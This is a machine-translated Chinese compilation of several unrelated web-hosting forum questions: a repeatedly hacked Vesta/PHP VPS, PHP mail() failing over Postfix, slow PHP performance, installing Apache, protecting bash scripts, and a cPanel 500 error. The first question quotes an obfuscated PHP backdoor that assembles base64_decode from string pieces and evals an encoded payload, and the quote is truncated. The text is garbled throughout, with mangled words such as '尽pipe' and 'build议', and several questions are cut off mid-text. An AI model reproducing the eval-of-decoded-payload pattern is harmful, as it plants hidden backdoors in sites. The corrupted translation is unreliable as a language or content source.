我使用Vesta和PHP运行Ubuntu 12.04 x64 VPS。 它被注入了几次,如下所示: <?php $KoDgalxVvsZfidVcEOTJDeMX='ba'.'se6'.'4_deco'.'de';eval($KoDgalxVvsZfidVcEOTJDeMX("cHJlZ19yZXBsYWNlKCIvN0xna0xnND1IR2JEOGs2WDht…. 为了解决这个问题,我决定把所有文件的权限和所有者更改为555和root,所以没有用户可以更改这些文件。 我删除了FTP访问并保护了SSH,因此只有VPS中的密钥才能连接。 尽pipe进行了所有这些更改,但其他用户始终能够更改文件,重命名文件夹并上传另一个被黑客入侵的文件。 你觉得我错过了什么? 任何build议? 谢谢! 如果您需要了解更多关于这个问题的信息,我会很乐意分享,帮助其他同样患上邪恶的人!
我无法让PHP的mail()函数在我的本地主机笔记本电脑上工作。 我正在使用Ubuntu 9.04,并在家中连接到无线networking进行互联网连接。 我在terminal中运行以下命令: sudo apt-get install postfix 一切都很好。 我没有看到任何错误。 当我跑了 mail('[email protected]', 'Subject', 'Message', 'From: localhost <[email protected]>') 在PHP中,函数返回true。 但即使它回复真实,我从来没有收到我的Hotmail帐户的电子邮件。 我错过了一个步骤? 我看着我的mail.log,它说我的连接超时: Nov 7 00:36:30 john-laptop postfix/pickup[28698]: BB7E14F00AD: uid=33 from=<www-data> Nov 7 00:36:30 john-laptop postfix/cleanup[29131]: BB7E14F00AD: message-id=<20091107053630.BB7E14F00AD@john-laptop> Nov 7 00:36:30 john-laptop postfix/qmgr[4088]: BB7E14F00AD: from=<www-data@john-laptop>, size=316, nrcpt=1 (queue active) Nov 7 00:37:03 john-laptop postfix/smtp[29133]: connect to mx01.1and1.com[74.208.5.4]:25: […]
我刚刚订阅了一个新的专用服务器,并且越来越差于预期的PHP执行性能。 执行时间是我的旧共享服务器上的两倍! 我绝对不是服务器pipe理专家,所以我想知道我错过了什么。 这里有一些东西可能有助于弄清楚这里有什么问题: 我的服务器(法文,但很容易理解) 的phpinfo(); 产量 PHP脚本(专用服务器) PHP脚本(旧共享服务器) 在内核更新和apache2和php的基本apt-get install之后,获得如此糟糕的性能是否正常?
我对这个知之甚less,但我正在尝试学习。 我在以下页面: http://httpd.apache.org/download.cgi#apache22 首先,我要下载哪一个: Unix Source: httpd-2.2.21.tar.gz [PGP] [MD5] [SHA1] Unix Source: httpd-2.2.21.tar.bz2 [PGP] [MD5] [SHA1] Win32 Source: httpd-2.2.21-win32-src.zip [PGP] [MD5] [SHA1] Win32 Binary without crypto (no mod_ssl) (MSI Installer): httpd-2.2.21-win32-x86- no_ssl.msi [PGP] [MD5] [SHA1] Win32 Binary including OpenSSL 0.9.8r (MSI Installer): httpd-2.2.21-win32-x86-openssl-0.9.8r.msi [PGP] [MD5] [SHA1] NetWare Binary: apache_2.2.21-netware.zip [PGP] [MD5] [SHA1] 其他文件 我猜测Unix,但不是很坦白地说。 我下载这个之后,我该如何安装。 […]
几个月前,我做了一个有点出色的实验,今天我们有一个使用以下技术的Intranet门户: JeasyUI phpgrid Kibana 那么,基于我们的testing,为什么我们需要使用apache? PS:我不是无效的Apache,这个问题只是为了好奇 :编辑 当我的意思是“我们”,我的意思是“我们”作为使用小型networking应用程序的小团队
我正在使用networking解决scheme托pipe。 我最近遭到JS:Illredir-S [Trj]的攻击,我让我的托pipe服务提供商把它清理干净,并更新了所有的密码,但是现在一周后我的站点又被JS感染了:ScriptIP-inf [Trj] 。 任何人都可以请build议我如何妥善保护我的网站? 我应该改变我的托pipe服务提供商 我在我的网站上一次又一次地厌倦了这些病毒。 我甚至无法在我的文件中find这个病毒。 请发布翔实的答案。 谢谢
正如标题所说,这会有帮助吗? 想象一个分类广告网站,用户只需login,注销,发布分类信息,删除分类信息等等。 全部用PHP和mysql。 我有我自己的服务器,IPtables。 我应该阻止除了从我自己的服务器IP到MySql端口的所有stream量? 谢谢
如何closures我的PHP-Apache网站使用的几个bash脚本的访问权限? 我在我的文档根/var/www/有一个index.php文件。 index.php应该调用一些目前在/var/www/scripts/目录中的bash脚本。 不过,我不喜欢这些脚本可以通过请求http://mysite.com/scripts/script1.sh从Internet上下载的事实。 如何closures对脚本的访问,允许它们被index.php调用?
这个值是不是与请求脚本的计算机的IP值相匹配,而不pipe它是否与托pipe该脚本的计算机相同?
我运行一个相当受欢迎的网站(我不是想吹牛,但是我有两万个用户需要访问,我不想再让他们等待),而且我已经停下了将近一个月的时间,而我试图find出了什么问题。 基本上,我不能运行任何PHP。 这一切都发生在我们把我的账户转到CPanel之后,所以我可以在没有我的networkingpipe理员的帮助下自己pipe理事情。 我喜欢有CPanel访问,但我不能运行任何PHP。 我重新上传了网站,恢复了1.3TB数据库,创build了新的子域名,更改了所有权,固定的权限,使CPanel中的所有内容都变得完美。 不过,运行该网站时,我只能得到一个500错误。 没有PHP的作品,甚至没有一个简单的回声。 我做了新的.php文件,并尝试,仍然没有去。 当我在WAMP和XAMPP中运行站点时,它工作正常(我猜)我没有看到站点,它只是抱怨找不到数据库,因为$ databasevariables是为localhost设置的。 我的网站pipe理员和我已经尝试了一切。 HTML工作正常。 我几乎卡在这里。 如果你想看到自己的500错误:capecraft.capturedhdtv.com/capes/site/demo.php。 任何解决scheme将非常赞赏。 此外,我们已经尝试删除.htaccess的东西。 另外,我的日志告诉我绝对没有。 FTP中的error_log告诉我在安装过程中我很久以前犯的错误,比如404.shtml不存在,因为我忘了复制它。 cPanel中的错误日志告诉我没有任何关于我的问题。 文件如何不存在,人们正试图访问,例如一个图片是不是在服务器上(不涉及所有网站) CPanel日志:在哪里你看到.png和一个缺less的IP,或目录的一部分,我出于安全目的删除它。 [Fri Feb 24 03:35:14 2012] [error] [client ] File does not exist: /home//public_html/capes2/404.shtml [Fri Feb 24 03:35:14 2012] [error] [client ] File does not exist: /home//public_html/capes2/.png [Fri Feb 24 03:35:13 2012] [error] [client ] […]